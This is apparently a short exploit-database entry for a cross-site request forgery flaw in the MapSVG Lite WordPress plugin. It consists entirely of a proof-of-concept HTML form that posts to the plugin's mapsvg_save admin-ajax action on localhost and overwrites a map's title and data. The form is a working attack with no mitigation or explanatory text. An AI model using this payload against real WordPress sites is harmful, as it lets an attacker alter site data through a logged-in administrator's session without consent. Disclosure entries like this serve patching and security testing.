MapSVG Lite – Cross-Site Request Forgery (CSRF)

  exploits
<form method="POST" action="http://localhost:8080/wp-admin/admin-ajax.php?action=mapsvg_save">
 <input type="text" name="data[title]" value="A bad value">
 <input type="text" name="data[mapsvg_data]" value="">
 <input type="text" name="data[map_id]" value="2">
 <input type="submit">
</form>